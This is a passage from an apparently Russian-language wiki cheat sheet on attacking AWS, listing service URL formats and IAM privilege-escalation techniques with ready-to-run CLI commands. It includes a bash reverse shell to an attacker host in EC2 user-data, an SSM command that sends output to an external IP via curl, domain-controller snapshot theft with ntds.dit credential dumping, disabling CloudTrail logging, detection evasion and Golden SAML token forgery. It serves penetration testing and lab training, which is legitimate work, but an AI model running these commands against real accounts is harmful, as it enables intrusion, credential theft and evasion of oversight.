==== glue:CreateDevEndpoint + iam:PassRole ====

Позволяет получить доступ к ролям, которые прикреплены к любому сервису Glue:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws glue create-dev-endpoint --endpoint-name my_dev_endpoint --role-arn arn_of_glue_service_role --public-key file://path/to/my/public/ssh/key.pub
</syntaxhighlight>

== S3 ==

Файловое хранилище, доступное по http(s).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{bucket_name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket_name}/

# US Standard
http://s3.amazonaws.com
# Ireland
http://s3-eu-west-1.amazonaws.com
# Northern California
http://s3-us-west-1.amazonaws.com
# Singapore
http://s3-ap-southeast-1.amazonaws.com
# Tokyo
http://s3-ap-northeast-1.amazonaws.com
</syntaxhighlight>

Делать запросы можно:

* В браузере - http(s)

* Используя awscli:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

В S3 может использоваться шифрование:

* SSE-KMS - Server-Side с ключами KMS

* SSE-C - Server-Side с ключами заказчика

* CSE-KMS - Client-Side с ключами KMS

* CSE-C - Client-Side с ключами заказчика

=== Сбор информации ===

==== Определение региона ====

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
$ dig flaws.cloud
;; ANSWER SECTION:
flaws.cloud. 5 IN A 52.218.192.11

$ nslookup 52.218.192.11
Non-authoritative answer:
11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com

# Итоговый URL будет:
flaws.cloud.s3-website-us-west-2.amazonaws.com
flaws.cloud.s3-us-west-2.amazonaws.com
</syntaxhighlight>
Если будет некорректный регион - редиректнет на корректный.

==== Список файлов ====

На S3-Bukket может быть включен листинг директорий, для этого достаточно перейти в браузере на хранилище и посмотреть возвращенный XML.

Список файлов может быть включен отдельно на определенные директории, поэтому может потребоваться брут директорий используя, например, wfuzz (подстрока AccessDenied).

=== Роли - управление ===

==== s3:ListBucket ====

Посмотреть список файлов в S3-хранилище:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3 ls s3://flaws.cloud/ [--no-sign-request] [--profile <PROFILE_NAME>] [ --recursive] [--region us-west-2]
</syntaxhighlight>

==== s3:ListAllMyBuckets ====

Посмотреть список всех S3-хранилищ, доступных мне:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws s3api list-buckets
aws s3 ls
</syntaxhighlight>

== CloudFront ==

Сервис сети доставки контента (CDN).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.cloudfront.net
</syntaxhighlight>

== EC2 (Elastic Compute Cloud) ==

EC2 (Amazon Elastic Compute Cloud) == VPS

Состоит из:

* Instance - название виртуальной машины

* AMI (Amazon Machine Image) - образ виртуальной машины

* SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
ec2-{ip-seperated}.compute-1.amazonaws.com
</syntaxhighlight>

=== SSM Agent ===

Как уже выше написано, SSM Agent - программное обеспечение Amazon, которое запущено на всеx EC2-инстансах, серверах и тд.

Его тоже можно выбрать целью атаки

==== MITM ====

Есть возможность вклиниваться в общение от SSM-Агента локально.

PoC: https://github.com/Frichetten/ssm-agent-research/tree/main/ssm-session-interception

Полная статья: https://frichetten.com/blog/ssm-agent-tomfoolery/

=== Роли - повышение привилегий ===

==== ec2:RunInstance + iam:PassRole ====

Позволяет прикрепить существующую роль к скомпрометированной EC2-машине.

1. Запуск машины c новой прикрепленной ролью

2. Подключение к ней

3. Работа с прикрепленной ролью

Создание EC2 с известным SSH-ключем:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --key-name my_ssh_key --security-group-ids sg-123456
</syntaxhighlight>

Второй вариант - скрипт для запуска:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 run-instances --image-id ami-a4dc46db --instance-type t2.micro --iam-instance-profile Name=iam-full-access-ip --user-data file://script/with/reverse/shell.sh
</syntaxhighlight>

Важно! Может спалиться с GuardDuty когда учетные данные пользователя будут использованы на стороннем инстансе EC2.

=== Роли - повышение до админа ===

==== ec2:AssociateIamInstanceProfile ====

Позволяет менять IAM политики/роли/пользователей

==== ec2:CreateInstanceProfile/ec2:AddRoleToInstanceProfile + iam:PassRole ====

Позволяет создать новый привилегированный профиль для инстанса и прикрепить его к скомпрометированной EC2-машине.

=== Роли - управление ===

==== ec2:CreateVolume + ec2:AttachVolume ====

См. EBS.

==== ec2:DescribeSnapshots ====

Позволяет посмотреть информацию о SnapShot'ах, которые позже мб потребуется прочитать:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 describe-snapshots --profile flawscloud --owner-id 975426262029 --region us-west-2
</syntaxhighlight>

==== ec2:CreateVolume ====

Прзврояет примаунтить SnapShot, чтобы потом его изучить:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 create-volume --profile YOUR_ACCOUNT --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89
</syntaxhighlight>

==== ec2:* (Копирование EC2) ====

Позволяет скопировать EC2 используя AMI-images:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Создаем новый AMI из Instance-ID
aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name "AWS Audit" --description "Export AMI" --region eu-west-1

# Добавляем наш ключ в систему
aws ec2 import-key-pair --key-name "AWS Audit" --public-key-material file://~/.ssh/id_rsa.pub --region eu-west-1

# Создаем EC2-Instance используя созданный AMI (параметры security group и подсеть оставили те же)
aws ec2 run-instances --image-id ami-0b77e2d906b00202d --security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --count 1 --instance-type t2.micro --key-name "AWS Audit" --query "Instances[0].InstanceId" --region eu-west-1

# Проверяем запустился ли инстанс
aws ec2 describe-instances --instance-ids i-0546910a0c18725a1

# Не обязательно - редактируем группу инстанса
aws ec2 modify-instance-attribute --instance-id "i-0546910a0c18725a1" --groups "sg-6d0d7f01" --region eu-west-1

# В конце работы - останавливаем и удаляем инстанс
aws ec2 stop-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west-1
</syntaxhighlight>

==== ec2-instance-connect:SendSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-ssh-public-key --region us-east-1 --instance-id INSTANCE --availability-zone us-east-1d --instance-os-user ubuntu --ssh-public-key file://shortkey.pub --profile uploadcreds</syntaxhighlight>

==== ec2-instance-connect:SendSerialConsoleSSHPublicKey ====

Добавить SSH-ключ к EC2-инстансу. Ключ будет существовать 60 секунд.

В отличие от предыдущего пункта, этот ключ можно использовать только при подключении EC2 Serial Console.

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию об инстансе, который будем атаковать.
aws ec2 describe-instances --profile uploadcreds --region eu-west-1 | jq ".[][].Instances | .[] | {InstanceId, KeyName, State}"

# Добавляем ключ к EC2-инстансу.
aws ec2-instance-connect send-serial-console-ssh-public-key --instance-id i-001234a4bf70dec41EXAMPLE --serial-port 0 --ssh-public-key file://my_key.pub --region us-east-1

# Подключаемся (кроме GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-east-1.aws
# Подключаемся (только для GovCloud US региона)
ssh -i my_key i-001234a4bf70dec41EXAMPLE.port0@serial-console.ec2-instance-connect.us-gov-east-1.amazonaws.com

# В некоторых случаях нужно подключиться к EC2 и перезагрузить сервис getty (лучше пробовать только, когда не смогли подключиться)
sudo systemctl restart serial-getty@ttyS0
# Если не сработало - мб требуется ребутать сервер.
</syntaxhighlight>

Также можно подключиться, используя браузер. Подробнее тут: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/connect-to-serial-console.html

==== ssm:SendCommand ====

Позволяет запускать команды в EC2-Instances. Если нет дополнительных прав, то потребуется:

* Знать Instance-ID, на котором запущен сервис SSM

* Свой сервер, на который будет приходить отстук - результат команды.

Команды для эксплуатации:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Получаем информацию о SSM сервисах - может потребоваться ssm:DescribeInstanceInformation
aws ssm describe-instance-information --profile stolencreds --region eu-west-1
# Выполняем команду
aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
# Получаем результат команды(может не хватить прав ssm:ListCommandInvocations)
aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds

# Пример - результат команды на удаленный сервер
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
</syntaxhighlight>

==== EC2:CreateSnapshot + Active Directory ====

См. AD.

== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:A2i.png|1000px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

Автоматизируйте проверку кода и оптимизируйте производительность приложений с помощью рекомендаций на базе машинного обучения

[[File:Aws codeguru.png| 1000px]]

https://aws.amazon.com/ru/codeguru/

Разделяется на следующие части:

- Reviewer - выявляет критические проблемы, уязвимости системы безопасности и трудноуловимые ошибки + дает рекомендации (языки Java и Python) - статикой.

- Profiler - выявление самых дорогостоящих строк, повышение производительности и тд засчет запуска в среде выполнения. Важно особенно для тех, кто платит за время работы скриптов.

Также на странице есть упоминание про их игру - BugBust

https://us-east-1.console.aws.amazon.com/codeguru/bugbust/participant#/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

Сервис по извлечению ценной информации из текста и работе с ним.

[[File:Aws comprehend.png|1000px]]

Список категорий, на которые может разбить текст, есть на фото выше.

Для пользовательских настроек есть несколько параметров:

- Кастомные классификации

- Кастомные определения вставок в тексте

- Endpoints - для real-time работы. !!! Достаточно дорогой сервис. В месяц берет 1400$ при минимальной сборке, поэтому если злоумышленник сможет запускать в нем Endpoint'ы в большом количестве, то компания обанкротится.

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

